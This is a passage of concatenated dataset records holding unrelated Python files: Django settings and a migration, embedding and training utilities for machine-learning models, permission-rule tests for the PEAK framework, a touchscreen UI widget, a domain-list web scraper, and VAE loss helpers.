self.bomba","sub_path":"CrazyCars/Bomba.py","file_name":"Bomba.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552107387","text":"#!/usr/bin/env python3\n# coding=utf-8\n# b = [1, 1, 1, 2]\n\n\n# def find_uniue(arr):\n# a, b = set(arr)\n# return a if arr.count(arr) == 1 else b\n# print(find_uniue())\n\n\na = \"2 4 7 8 10\"\nb = \"1 1 1 1 2\"\n\n\ndef iq_test(numbers):\n num = list(map(lambda x: x % 2, map(int, numbers.split(\" \"))))\n a, b = set(num)\n return num.index(a) + 1 if num.count(a) == 1 else num.index(b) + 1\n\n\nprint(iq_test(a))\n","sub_path":"demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249717926","text":"# -*- coding: utf-8 -*-\n\"\"\"Settings module for version_endpoint package.\n\nCopyright 2019 Propylon Ltd.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom django.conf import settings\n\nPACKAGE_NAMES = getattr(\n settings,\n 'VERSION_ENDPOINT_PACKAGE_NAMES',\n ['django-version-endpoint', 'Django']\n)\n\nALLOWED_PACKAGE_NAMES = getattr(\n settings,\n 'VERSION_ENDPOINT_ALLOWED_PACKAGE_NAMES',\n PACKAGE_NAMES\n)\n","sub_path":"src/version_endpoint/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215699594","text":"# File:\n# -*- coding: utf-8 -*-\n# @Time : 4/13/2019 3:57 PM\n# @Author : Derek Hu\nimport numpy as np\nimport json\n\n\nglove_300d = \"/data2/zhe/glove/glove.42B.300d.txt\"\n\ndef to_categorical(label):\n if label == 0:\n return np.array([1, 0])\n if label == 1:\n return np.array([0, 1])\n\n\ndef load_embeddings(path, word_dict, 
embedding_dim):\n print(\"Loading Glove vectors...\")\n word_vectors = {}\n with open(path, encoding=\"utf-8\") as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n embedding = np.asarray(values[1:], dtype='float32')\n word_vectors[word] = embedding\n #word_embedding_matrix = np.zeros((len(word_dict), embedding_dim))\n word_embedding_matrix = np.random.normal(0, 1, (len(word_dict), embedding_dim))\n for word, i in word_dict.items():\n embedding_vector = word_vectors.get(word)\n if embedding_vector is not None:\n word_embedding_matrix[i] = embedding_vector\n return np.array(word_embedding_matrix)\n\n\ndef batch_iter_json(data, batch_size, num_epochs, shuffle=True):\n data = np.array(data)\n num_batches_per_epoch = (len(data) - 1) // batch_size + 1\n\n for epoch in range(num_epochs):\n # print(\"-------\"*10, \"epoch: \", epoch, \"-------\"*10)\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(len(data)))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, len(data))\n yield shuffled_data[start_index:end_index], \\\n epoch\n","sub_path":"coherence_interface/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455883958","text":"\"\"\"Permission tests\"\"\"\n\nfrom unittest import TestCase, makeSuite, TestSuite\nfrom peak.api import *\nfrom peak.tests import testRoot\n\n\nclass SimpleTests(TestCase):\n\n def setUp(self):\n self.context = security.Context()\n\n def checkUniversals(self):\n assert self.context.hasPermission(None, security.Anybody, None)\n assert not self.context.hasPermission(None, security.Nobody, None)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass ManageAsset(security.Permission): pass\nclass ManageBatch(security.Permission): pass\n\nclass Worker(security.Permission): pass\nclass Manager(security.Permission): pass\nclass Shipper(security.Permission): pass\nclass Receiver(security.Permission): pass\nclass Owner(security.Permission): pass\nclass SelfOrManager(security.Permission): pass\nclass ShipmentViewer(security.Permission): pass\n\nclass Facility:\n\n binding.metadata(\n viewShipments = ShipmentViewer,\n manageWorkers = Manager,\n )\n\nclass Batch:\n binding.metadata(\n edit = ManageBatch,\n delete = Owner,\n )\n\nclass Shipment(Batch):\n binding.metadata(\n receiveShipment = Receiver,\n cancelShipment = Shipper\n )\n\nclass Asset(object):\n binding.metadata(\n edit = ManageAsset\n )\n\nclass Person(object):\n binding.metadata(\n edit = SelfOrManager\n )\n\n\nclass EquipmentRules(security.Context):\n\n [security.hasPermission.when(\"perm==Worker and subject in Shipment\")]\n def checkWorkerForShipment(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.fromFacility\n ) or self.hasPermission(user, Worker, subject.toFacility\n ) or security.Denial(\n \"You need to be a worker at either the origin or destination\"\n \" facility for this shipment.\"\n )\n\n [security.hasPermission.when(\"perm==Manager and subject in Person\")]\n def checkSupervisor(self, user, perm, subject):\n return user is subject.supervisor or security.Denial(\n \"You must be a supervisor of this person.\"\n )\n\n [security.hasPermission.when(\"perm==SelfOrManager\")]\n def checkSelfOrManager(self, user, perm, subject):\n return user in 
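# --- Illustrative sketch (not part of the original files): `load_embeddings`
# above initializes the whole matrix from N(0, 1) and then overwrites only the
# rows whose words appear in the pretrained vocabulary, so out-of-vocabulary
# words keep a random (still trainable) vector. Toy data below is made up.
import numpy as np

word_dict = {'the': 0, 'cat': 1, 'zzyzx': 2}              # toy vocabulary
pretrained = {'the': np.ones(4), 'cat': np.full(4, 2.0)}  # toy GloVe subset

matrix = np.random.normal(0, 1, (len(word_dict), 4))
for word, row in word_dict.items():
    if word in pretrained:
        matrix[row] = pretrained[word]

assert (matrix[0] == 1.0).all() and (matrix[1] == 2.0).all()  # row 2 stays random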
(subject,subject.supervisor) or security.Denial(\n \"You must be this person or their supervisor.\"\n )\n\n [security.hasPermission.when(\"perm in [ManageAsset, ShipmentViewer]\")]\n def checkWorkerOrManager(self, user, perm, subject):\n return self.hasPermission(\n user, Worker, subject\n ) or self.hasPermission(user,Manager,subject) or security.Denial(\n \"You need to be a worker or manager at the relevant facility\"\n )\n\n [security.hasPermission.when(\"perm in [Worker, Manager]\")]\n def checkPermissionsInPlace(self, user, perm, subject):\n # check same permission, but for location\n return self.hasPermission(user,perm,subject.location)\n\n\n\n\n\n\n [security.hasPermission.when(\"perm==ManageBatch\")]\n def checkManageBatch(self, user, perm, subject):\n return (\n self.hasPermission(user,Owner,subject) or\n self.hasPermission(user,Worker,subject) or\n self.hasPermission(user,Manager,subject) or\n security.Denial(\n \"You must be the batch's owner, or a worker or manager at\"\n \" the relevant facility.\"\n )\n )\n\n\n [security.hasPermission.when(\"perm==Shipper and subject in Shipment\")]\n def checkShipper(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.fromFacility)\n\n [security.hasPermission.when(\"perm==Receiver and subject in Shipment\")]\n def checkReceiver(self, user, perm, subject):\n return self.hasPermission(user, Worker, subject.toFacility)\n\n [security.hasPermission.when(\"perm==Worker and subject in Facility\")]\n def checkWorkerForFacility(self, user, perm, subject):\n return user.facility is subject or security.Denial(\n \"You must be a worker at the relevant facility.\"\n )\n\n [security.hasPermission.when(\"perm==Manager and subject in Facility\")]\n def checkManagerForFacility(self, user, perm, subject):\n return user in subject.managers or security.Denial(\n \"You must be a manager at the relevant facility\"\n )\n\n [security.hasPermission.when(\"perm==Owner and subject in Batch\")]\n def checkBatchOwner(self, user, perm, subject):\n return user is subject.owner or security.Denial(\n \"You must be the batch's owner\"\n )\n\n\n\nNewYork = Facility()\nNewYork.name = 'New York'\nMrSmythe = Person()\nMickey = Person()\n\nMrSmythe.name = 'Smythe'\nMrSmythe.facility = NewYork\nMrSmythe.supervisor = None\n\nMickey.name = 'Mickey D'\nMickey.facility = NewYork\nMickey.supervisor = MrSmythe\n\nParis = Facility()\nParis.name = 'Paris'\nJeanPierre = Person()\nBobChien = Person()\n\nJeanPierre.name = 'J.P.'\nJeanPierre.facility = Paris\nJeanPierre.supervisor = None\n\nBobChien.name = 'Bob le Chien'\nBobChien.facility = Paris\nBobChien.supervisor = JeanPierre\n\nNewYork.managers = MrSmythe,\nParis.managers = JeanPierre,\n\n\n\n\n\n\n\n\n\n\n\n\n\nBatch123 = Batch()\nBatch123.name = 'Batch 123'\nBatch123.location = NewYork\nBatch123.owner = Mickey\n\nMegaMachine = Asset()\nMegaMachine.name = 'Mega Machine'\nMegaMachine.location = Batch123\n\nMegaDrive = Asset()\nMegaDrive.name = 'Mega Drive'\nMegaDrive.location = MegaMachine\n\nShipment16 = Shipment()\nShipment16.name = 'Shipment 16'\nShipment16.location = Paris\nShipment16.fromFacility = Paris\nShipment16.toFacility = NewYork\nShipment16.owner = BobChien\n\nThingy = Asset()\nThingy.name = 'Thingy'\nThingy.location = Shipment16\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nscenarios = [\n\n (NewYork, 'viewShipments', [MrSmythe,Mickey]),\n (NewYork, 'manageWorkers', [MrSmythe]),\n (Paris, 'viewShipments', [JeanPierre,BobChien]),\n (Paris, 'manageWorkers', [JeanPierre]),\n\n (MrSmythe,'edit',[MrSmythe]),\n 
(Mickey,'edit',[Mickey,MrSmythe]),\n (JeanPierre,'edit',[JeanPierre]),\n (BobChien,'edit',[BobChien,JeanPierre]),\n\n (Shipment16,'cancelShipment',[JeanPierre,BobChien]),\n (Shipment16,'receiveShipment',[MrSmythe,Mickey]),\n (Shipment16,'edit',[MrSmythe, Mickey, JeanPierre, BobChien]),\n (Shipment16,'delete',[BobChien]),\n (Shipment16,'undefined',[]),\n\n (Thingy, 'edit', [MrSmythe, Mickey, JeanPierre, BobChien]),\n (MegaDrive, 'edit', [MrSmythe, Mickey]),\n (MegaMachine, 'edit', [MrSmythe, Mickey]),\n\n (Batch123, 'delete', [Mickey]),\n (Batch123, 'edit', [MrSmythe, Mickey]),\n]\n\nclass ScenarioTests(TestCase):\n\n def assertAllowed(self, subject, name, users):\n context = EquipmentRules()\n perm = context.permissionFor(subject,name)\n for person in MrSmythe, Mickey, JeanPierre, BobChien:\n allowed = context.hasPermission(person,perm,subject)\n assert not allowed==(person not in users), (\n \"%s fails for %s.%s\" % (person.name, subject.name, name)\n )\n\n def checkScenarios(self):\n for s in scenarios:\n self.assertAllowed(*s)\n\nTestClasses = (\n SimpleTests, ScenarioTests\n)\n\n\ndef test_suite():\n return TestSuite([makeSuite(t,'check') for t in TestClasses])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/security/tests/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472035803","text":"import image\n\ntry:\n from ui_canvas import ui\n from touch import Touch, touch\n from core import system\nexcept ImportError:\n from ui.ui_canvas import ui\n from driver.touch import Touch, touch\n from lib.core import system\n\n\nclass Widget:\n def __init__(self, x, y, w, h):\n self.__x = x\n self.__y = y\n self.__w = w\n self.__h = h\n\n self.__border_color = None\n self.__border_thickness = 0\n self.__bg_color = None\n self.__bg_img = None\n self.__bg_img_padding_left = None\n self.__bg_img_padding_top = None\n self.__aplpha = True\n\n self.__eves = {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}\n self.__eargs = {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}\n self.__eve_enable = False\n setattr(self, \"touch_event\", self.touch_event_)\n\n # 将 widget 显示在 Canvas 上\n def draw(self):\n # fill background\n if self.__bg_color:\n ui.canvas.draw_rectangle(\n self.__x, self.__y, self.__w, self.__h, color=self.__bg_color, fill=True)\n if self.__bg_img:\n ui.canvas.draw_image(self.__bg_img, self.__x + self.__bg_img_padding_left,\n self.__y + self.__bg_img_padding_top, alpha=255)\n if self.__border_color:\n ui.canvas.draw_rectangle(self.__x, self.__y, self.__w, self.__h,\n self.__border_color, thickness=self.__border_thickness)\n\n def _point_in_widget(self, point):\n x = point[0]\n y = point[1]\n if x >= self.__x and x <= self.__x + self.__w and y >= self.__y and y <= self.__y + self.__h:\n return True\n return False\n\n def touch_event_(self, *args):\n if self._point_in_widget(touch.points[1]) and self.__eves[touch.state] != None:\n self.__eves[touch.state](self.__eargs[touch.state]) if self.__eargs[touch.state] else self.__eves[touch.state]()\n\n # eve_name: event name, string type\n def register_event(self, eve_name, func, *args):\n for e in self.__eves.keys():\n if e == eve_name:\n self.__eves[e] = func\n self.__eargs[e] = args\n if self.__eve_enable == False:\n print(self, \"register touch event\")\n 
touch.register_touch_event(self.touch_event, None)\n self.__eve_enable = True\n return\n\n print(\"event name error, please use follow values:\")\n for i in self.__eves.keys():\n print(i)\n\n def unregister_event(self, eve_name):\n for e in self.__eves.keys():\n if e == eve_name:\n self.__eves[e] = None\n self.__eargs[e] = None\n if self.__eve_enable and self.__eves == {Touch.press: None, Touch.click: None,\n Touch.idle: None, Touch.drag: None}:\n touch.unregister_touch_event(self.touch_event)\n self.__eve_enable = False\n return\n \n print(\"event name error, please use follow values:\")\n for i in self.__eves.keys():\n print(i)\n\n def set_bg_color(self, color):\n self.__bg_color = color\n self.draw()\n\n def set_bg_img(self, img, padding_left=None, padding_top=None):\n self.__bg_img = img\n w = self.__bg_img.width()\n h = self.__bg_img.height()\n\n # default center\n self.__bg_img_padding_left = (self.__w - w) // 2\n self.__bg_img_padding_top = (self.__h - h) // 2\n\n # custom pos\n if padding_left:\n self.__bg_img_padding_left = padding_left\n if padding_top:\n self.__bg_img_padding_top = padding_top\n self.draw()\n\n # set position and size\n def set_pos_size(self, x, y, w, h):\n self.clear()\n self.__w = w\n self.__h = h\n self.__x = x\n self.__y = y\n if self.__bg_img:\n self.set_bg_img(self.__bg_img.resize(w, h))\n self.draw()\n\n def set_border(self, color, thickness):\n self.__border_color = color\n self.__border_thickness = thickness\n self.draw()\n\n # clear background\n def clear(self):\n ui.clear(self.__x - self.__border_thickness, self.__y - self.__border_thickness,\n self.__w + self.__border_thickness, self.__h + self.__border_thickness)\n\n\nif __name__ == '__main__':\n import time\n import os\n try:\n from touch import Touch\n from core import system\n except:\n from driver.touch import Touch\n from lib.core import system\n\n ui.set_bg_color((255, 255, 0))\n\n img = image.Image(os.getcwd() + \"/res/icons/app_camera.bmp\")\n # create widget\n wig = Widget(0, 0, 100, 100)\n wig.set_pos_size(0, 0, 80, 80)\n wig.set_bg_img(img)\n wig.set_border((255, 255, 255), 1)\n\n def on_press(wig):\n wig=wig[0]\n wig.set_bg_color((0, 0, 255))\n wig.set_pos_size(0, 0, 100, 100)\n print(\"wig press\")\n\n wig.register_event(Touch.click, on_press, wig)\n # wig.unregister_event(Touch.press)\n system.event(0, ui.display)\n clock = time.clock()\n pos_x = 0\n while True:\n clock.tick()\n pos_x+=1\n wig.set_pos_size(pos_x, 10, 100, 100)\n system.parallel_cycle()\n # print(clock.fps())\n","sub_path":"ui/ui_widget.py","file_name":"ui_widget.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213694899","text":"# https://www.expireddomains.net/\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport csv\n\n\n\nmain_url = 'https://www.expireddomains.net'\n# GET request to fetch raw html content\nmain_response = requests.get(main_url)\n# parse html content\nmain_data = BeautifulSoup(main_response.content,\"lxml\")\n\nua_dmn_aux1 = ''\n# filter link for domains UA\nfor dmn_link in main_data.find_all('a'):\n\tif 'ua' in dmn_link.text:\n\t\tua_dmn_aux1 = dmn_link.get('href')\nua_dmn_url = ua_dmn_aux1\nprint(ua_dmn_url)\n\n# combine link to ua domain page\nua_dmn_url = main_url.strip() + ua_dmn_url.strip()\nprint(ua_dmn_url)\n\ntime.sleep(2)\n# GET request to fetch raw html content\nuadmn_response = requests.get(ua_dmn_url)\n# parse html content\nuadmn_data = 
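# --- Illustrative sketch (not part of the original script): the
# table-scraping pattern used below in miniature — parse rows with
# BeautifulSoup, clean each cell with the same regex, and stream rows to a
# csv.writer. The HTML snippet and file name here are made up.
import csv
import re
from bs4 import BeautifulSoup

html = "<table><tr><td> a.ua </td><td>3</td></tr></table>"
rows = BeautifulSoup(html, "lxml").find_all("tr")
with open("demo.csv", "w", newline="") as f:
    writer = csv.writer(f, delimiter=";")
    for tr in rows:
        cells = [re.sub(r"[\'\s]+", "", td.get_text()) for td in tr.find_all("td")]
        writer.writerow(cells)  # -> a.ua;3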
BeautifulSoup(uadmn_response.content,\"lxml\")\n# find url table\n\n# uadmn_table = uadmn_data.find('table', attrs = {'class': 'base1'})\nuadmn_table = uadmn_data.select_one('div.listing > table.base1')\nuadmn_table_data = uadmn_table.find_all('tr')\n\n# open csv file\nf = open('ua_domains_list', 'w', newline='')\n# process data from html\nt_rec = []\nre_ptn = r'[\\'\\s]+'\nfor tr in uadmn_table_data:\n\t#append list\n\ttd_row = []\n\tfor td in tr:\n\t\ttd_elm = re.sub(re_ptn, '', td.string)\n\t\t# add record if not empty\n\t\tif td_elm != '':\n\t\t\ttd_row.append(td_elm)\n\t# write to csv file\n\tcsvwriter = csv.writer(f, delimiter=';')\n\tcsvwriter.writerow(td_row)\t\t\n\tprint(td_row)\n\tt_rec.append(td_row)\n# close csv file\nf.close()\t\n\n\n\n\n\n\n\n","sub_path":"HT_9/domains_scrape_ban.py","file_name":"domains_scrape_ban.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595208874","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport sorl.thumbnail.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Story',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('title', models.CharField(max_length=255, db_index=True)),\n ('blurb', models.TextField(null=True, blank=True)),\n ('cover_image', sorl.thumbnail.fields.ImageField(null=True, upload_to='')),\n ('published', models.BooleanField(default=False)),\n ('date', models.DateField(auto_now_add=True, auto_now=True)),\n ('slug', models.SlugField(null=True, unique=True, max_length=255, blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='StoryItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('image', sorl.thumbnail.fields.ImageField(null=True, upload_to='')),\n ('text', models.TextField(null=True, blank=True)),\n ('item_type', models.CharField(default='text', max_length=25, choices=[('Image', 'image'), ('Text', 'text')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='story',\n name='parts',\n field=models.ManyToManyField(null=True, to='core.StoryItem', blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545742515","text":"import copy\nimport torch\ntorch.manual_seed(1)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim.lr_scheduler import StepLR\nfrom sklearn.metrics import roc_curve\nfrom datetime import datetime\n\nimport numpy as np\nnp.random.seed(1)\n\nimport time\nimport utils\nimport models\nimport argparse\nimport data_loader\nimport pandas as pd\nimport ujson as json\n\nfrom sklearn import metrics\n\n#from ipdb import set_trace\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=1000)\nparser.add_argument('--batch_size', type=int, default=32)\nparser.add_argument('--model', type=str)\nparser.add_argument('--hid_size', type=int)\nparser.add_argument('--impute_weight', type=float)\n#parser.add_argument('--label_weight', 
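# --- Illustrative note (not part of the original script): the training
# script above is driven entirely by its argparse flags; a typical invocation
# (the model name and sizes are hypothetical) might look like:
#
#   python main.py --model brits --hid_size 64 --impute_weight 0.3 \
#       --epochs 1000 --batch_size 32
#
# args.model is later resolved dynamically via getattr(models, args.model).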
type=float)\nargs = parser.parse_args()\n\n\ndef train(model):\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n\n data_iter = data_loader.get_train(batch_size=args.batch_size)\n test_iter = data_loader.get_test(batch_size=args.batch_size)\n\n auroc_auprc = []\n\n for epoch in range(args.epochs):\n model.train()\n\n run_loss = 0.0\n\n for idx, data in enumerate(data_iter):\n data = utils.to_var(data)\n ret = model.run_on_batch(data, optimizer, epoch)\n\n run_loss += ret['loss'].item()\n\n print(\"\\r Progress epoch {}, {:.2f}%, average loss {}\".format(epoch, (idx + 1) * 100.0 / len(data_iter), run_loss / (idx + 1.0))),\n\n auroc_auprc.append(evaluate(model, test_iter))\n\n\n\ndef evaluate(model, val_iter):\n model.eval()\n\n #labels = []\n #preds = []\n\n evals = []\n imputations = []\n\n save_impute = []\n #save_label = []\n\n for idx, data in enumerate(val_iter):\n data = utils.to_var(data)\n ret = model.run_on_batch(data, None)\n\n # save the imputation results which is used to test the improvement of traditional methods with imputed values\n save_impute.append(ret['imputations'].data.cpu().numpy())\n #save_label.append(ret['labels'].data.cpu().numpy())\n\n #pred = ret['predictions'].data.cpu().numpy()\n #label = ret['labels'].data.cpu().numpy()\n is_train = ret['is_train'].data.cpu().numpy()\n\n eval_masks = ret['eval_masks'].data.cpu().numpy()\n eval_ = ret['evals'].data.cpu().numpy()\n imputation = ret['imputations'].data.cpu().numpy()\n\n evals += eval_[np.where(eval_masks == 1)].tolist()\n imputations += imputation[np.where(eval_masks == 1)].tolist()\n\n # collect test label & prediction\n #pred = pred[np.where(is_train == 0)]\n #label = label[np.where(is_train == 0)]\n\n #labels += label.tolist()\n #preds += pred.tolist()\n\n #print(\"The evaluated values --------------------------\", eval_)\n #print(\"The imputed values --------------------------\", imputations)\n #labels = np.asarray(labels).astype('float32')\n #preds = np.asarray(preds)\n\n # compute auroc and auprc\n #print(clf.score(values, labels)\n #fpr, tpr, thresholds = roc_curve(preds,labels)\n #plt.plot(fpr, label = 'fpr')\n #plt.plot(tpr, label = 'tpr')\n #plt.legend(fontsize=16)\n #auroc = metrics.roc_auc_score(labels, preds)\n #auprc = metrics.average_precision_score(labels, preds)\n\n\n #print('AUROC {}'.format(auroc), 'AUPRC {}'.format(auprc))\n # Compute average precision (AP) from prediction scores This score corresponds to the area under the precision-recall curve.\n # The worst AUPRC is 0, and the best AUPRC is 1.0. 
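    # [Illustrative aside, not part of the original file] With hypothetical
    # labels/preds, the commented-out sklearn calls above behave like this:
    #
    #     from sklearn import metrics
    #     labels = [0, 0, 1, 1]
    #     preds = [0.1, 0.4, 0.35, 0.8]
    #     metrics.roc_auc_score(labels, preds)            # -> 0.75
    #     metrics.average_precision_score(labels, preds)  # -> ~0.83
    #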
This is in contrast to AUROC, where the lowest value is 0.5.\n #print('AUPRC {}'.format(metrics.average_precision_score(labels, preds)))\n\n #cutoff = 0.5 #np.mean(preds)\n #rfc_pred = np.zeros_like(preds)\n #rfc_pred[preds > cutoff] = 1\n\n\n evals = np.asarray(evals)\n imputations = np.asarray(imputations)\n\n print('MAE', np.abs(evals - imputations).mean() )\n\n print('MRE', np.abs(evals - imputations).sum() / np.abs(evals).sum())\n\n save_impute = np.concatenate(save_impute, axis=0)\n #save_label = np.concatenate(save_label, axis=0)\n\n np.save('./result/{}_data'.format(args.model), save_impute)\n #np.save('./result/{}_label'.format(args.model), save_label)\n\n #auroc_auprc = [auroc, auprc]\n #return auroc_auprc\n\n\ndef run():\n model = getattr(models, args.model).Model(args.hid_size, args.impute_weight)\n total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print('Total params is {}'.format(total_params))\n\n if torch.cuda.is_available():\n model = model.cuda()\n\n train(model)\n\n\nif __name__ == '__main__':\n run()\n dateTimeObj = datetime.now()\n print(dateTimeObj)\n\n","sub_path":"Air-Quality/SampleData/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605370876","text":"from transactionRecord import transactionRecord\nfrom trainHistory import trainRecord\nfrom featureCustomer import *\nfrom featureOffer import *\nfrom featureCustomerOffer import *\n\ntrainF = file(\"trainHistory.csv\", \"r\")\n\nline = trainF.readline()\nline = trainF.readline()\nallCustToOfferTrain = {}\nwhile(line):\n allCustToOfferTrain[line.split(\",\")[0]] = trainRecord(line, train=True)\n line = trainF.readline()\ntrainF.close()\n\ntestF = file(\"testHistory.csv\", \"r\")\n\nline = testF.readline()\nline = testF.readline()\nallCustToOfferTest = {}\nwhile(line):\n allCustToOfferTest[line.split(\",\")[0]] = trainRecord(line, train=False)\n line = testF.readline()\ntestF.close()\n\n\n\n# summarize all records for the same customer\n# hold transactionRecord objects in self.transactions\n# hold functions for feature construction\nclass oneCustomerRecord: \n def __init__(self, line, train=True):\n self.transactions = []\n self.colnames = []\n self.transactions.append(transactionRecord(line))\n self.customerID = self.transactions[0].customerID\n \n if(train):\n allCustToOffer = allCustToOfferTrain\n else:\n allCustToOffer = allCustToOfferTest\n # link customer to offer\n self.offer = allCustToOffer[self.customerID].offer\n # link customer to repeater (t/f)\n # comment out for test data set\n if(train):\n rep = allCustToOffer[self.customerID].repeater ###########################\n if(rep == \"t\"):\n self.repeater = 1\n else:\n self.repeater = 0\n\n def addLine(self, line):\n self.transactions.append(transactionRecord(line))\n \n # function construct a list of features for a customer\n # return the list of features for the customer\n def getCustomerSummary(self, train=True):\n self.resultVector = []\n # construct feature X matrix\n getFeaturesCust(self.resultVector, self, self.colnames)\n getFeaturesOffer(self.resultVector, self.offer, self.colnames)\n getFeaturesCustOffer(self.resultVector, self.offer, self, self.colnames)\n # add in y column\n # only for training data set\n if(train):\n self.resultVector.append(self.repeater)\n self.colnames.append(\"y\")\n\n for i in range(len(self.resultVector)):\n self.resultVector[i] = str(self.resultVector[i])\n return 
self.resultVector\n\n\n","sub_path":"oneCustomerRecord.py","file_name":"oneCustomerRecord.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526074999","text":"\nimport math\n\nfrom tqdm import trange, tqdm\nimport torch\n\ndef _get_log_pz_qz_prodzi_qzCx(latent_sample, latent_dist, n_data, is_mss=True):\n batch_size, hidden_dim = latent_sample.shape\n\n # calculate log q(z|x)\n log_q_zCx = log_density_gaussian(latent_sample, *latent_dist).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 0\n zeros = torch.zeros_like(latent_sample)\n log_pz = log_density_gaussian(latent_sample, zeros, zeros).sum(1)\n\n mat_log_qz = matrix_log_density_gaussian(latent_sample, *latent_dist)\n\n if is_mss:\n # use stratification\n log_iw_mat = log_importance_weight_matrix(batch_size, n_data).to(latent_sample.device)\n mat_log_qz = mat_log_qz + log_iw_mat.view(batch_size, batch_size, 1)\n\n log_qz = torch.logsumexp(mat_log_qz.sum(2), dim=1, keepdim=False)\n log_prod_qzi = torch.logsumexp(mat_log_qz, dim=1, keepdim=False).sum(1)\n\n return log_pz, log_qz, log_prod_qzi, log_q_zCx\n\ndef _get_log_pz_qz_prodzi_qzCx_fip(latent_sample, z0sample, latent_dist, n_data, is_mss=True):\n batch_size, hidden_dim = latent_sample.shape\n\n # calculate log q(z|x)\n log_q_zCx = log_density_gaussian(latent_sample, *latent_dist).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 0\n zeros = torch.zeros_like(z0sample)\n log_pz = log_density_gaussian(z0sample, zeros, zeros).sum(1)\n\n mat_log_qz = matrix_log_density_gaussian(latent_sample, *latent_dist)\n\n if is_mss:\n # use stratification\n log_iw_mat = log_importance_weight_matrix(batch_size, n_data).to(latent_sample.device)\n mat_log_qz = mat_log_qz + log_iw_mat.view(batch_size, batch_size, 1)\n\n log_qz = torch.logsumexp(mat_log_qz.sum(2), dim=1, keepdim=False)\n log_prod_qzi = torch.logsumexp(mat_log_qz, dim=1, keepdim=False).sum(1)\n\n return log_pz, log_qz, log_prod_qzi, log_q_zCx\n\ndef matrix_log_density_gaussian(x, mu, logvar):\n \"\"\"Calculates log density of a Gaussian for all combination of bacth pairs of\n `x` and `mu`. I.e. return tensor of shape `(batch_size, batch_size, dim)`\n instead of (batch_size, dim) in the usual log density.\n\n Parameters\n ----------\n x: torch.Tensor\n Value at which to compute the density. Shape: (batch_size, dim).\n\n mu: torch.Tensor\n Mean. Shape: (batch_size, dim).\n\n logvar: torch.Tensor\n Log variance. 
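        (Editor's aside, hedged: for a standard normal, i.e. mu = 0 and
        logvar = 0, the log density at x = 0 reduces to the normalization
        constant alone, -0.5 * log(2 * pi) ~= -0.9189.)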
